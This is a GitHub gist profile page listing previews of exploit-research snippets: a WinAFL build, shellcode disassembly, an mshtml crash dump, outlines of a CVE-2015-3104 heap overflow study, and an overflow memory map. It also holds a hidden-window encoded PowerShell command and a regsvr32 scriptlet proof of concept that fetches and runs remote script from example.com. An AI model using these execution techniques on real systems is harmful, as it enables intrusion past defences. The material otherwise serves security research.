Skip to content

Instantly share code, notes, and snippets.

SkyBulk SkyBulk

Block or report user

Report or block SkyBulk

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View crash
how it was compiled
git clone https://github.com/googleprojectzero/winafl.git
git submodule update --init --recursive
mkdir build32
cd build32
cmake .. -DDynamoRIO_DIR=C:\Users\blackleitus\Desktop\DynamoRIO-Windows-7.1.0-1\cmake -DINTELPT=1
cmake --build . --config Release
# crash at the moment of run this commmand
View project.py
AutoComplete
class AutoComplete() :3
def __init__() :5
def complete() :8
def complete() :20
commands
View cap.py
from capstone import *
shellcode = "\x00\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x01\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x02\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x03\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x04\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x05\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x06\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += "\x07\x48\x8B\x01\xC3\xC3\xC3\xC3"
View ie
0:005> r
eax=00000000 ebx=008adff0 ecx=008f00a7 edx=00000000 esi=02d8bb70 edi=00000000
eip=7157b68f esp=02d8bb44 ebp=02d8bb5c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
mshtml!CElement::Doc+0x2:
7157b68f 8b5070 mov edx,dword ptr [eax+70h] ds:002b:00000070=????????
0:005> u mshtml!CElement::Doc
mshtml!CElement::Doc:
7157b68d 8b01 mov eax,dword ptr [ecx]
View awe
Heap Overflow Case Study: CVE-2015-3104 Proof of Concept
Heap Overflow Case Study: A Deeper Look at the Bug
Heap Overflow Case Study: Allocation Control.
Heap Overflow Case Study: Gaining Read/Write Access to the Memory Space
Heap Overflow Case Study: Defeating ASLR
Heap Overflow Case Study: Gaining code execution
Heap Overflow Case Study: Stack Pivoting
Heap Overflow Case Study: Defeating DEP
Executing Shellcode and Restoring the execution flow
Sandbox Escape
View gist:7a969e8854730d90f0c91929e41dc87f
Table of Contents
0. Testing Environment
0.1 Testing Environment
1. Software Vulnerability Review
View memory map
0141E388 41414141 AAAA `<----------- ESP starts here`
0141E38C 41414141 AAAA
0141E390 41414141 AAAA
0141E394 41414141 AAAA
0141E398 41414141 AAAA
0141E39C 41414141 AAAA
0141E3A0 41414141 AAAA
0141E3A4 41414141 AAAA
0141E3A8 41414141 AAAA
View info.ps1
powershell.exe -NoP -sta -NonI -W hidden -Enc QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBJACAAYQBtACAAYgBlAGkAbgBnACAAZQB4AGUAYwB1AHQAZQBkACAAZgByAG8AbQAgAHQAaABlACAAbQBlAG0AbwByAHkAIABkAHUAaAAgACEAIQAnACkA
View RegSvr32.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
You can’t perform that action at this time.